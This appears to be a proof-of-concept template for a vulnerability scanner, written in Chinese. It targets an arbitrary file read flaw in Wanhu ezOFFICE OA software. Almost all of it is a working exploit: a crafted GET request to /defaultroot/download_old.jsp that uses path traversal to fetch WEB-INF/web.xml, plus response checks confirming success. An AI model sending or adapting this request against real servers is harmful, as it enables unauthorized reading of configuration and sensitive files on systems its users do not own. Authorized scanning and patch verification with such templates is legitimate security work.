<DudePoc_Name>万户 OA 任意文件读取漏洞</DudePoc_Name>
<DudePoc_Description>Ezoffice系统是一套基于jsp的oa系统，该系统基于J2EE架构技术的三层架构，完全采用B/S体系结构，广泛应用于各个行业。攻击者通过构造恶意请求，利用 download_old.jsp 可直接遍历读取系统上的文件。</DudePoc_Description>
<DudePoc_SetHeader>
GET /defaultroot/download_old.jsp?path=..&name=x&FileName=$<AttackCode>$ HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>web-app</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode>WEB-INF/web.xml</DudePoc_AttackCode>
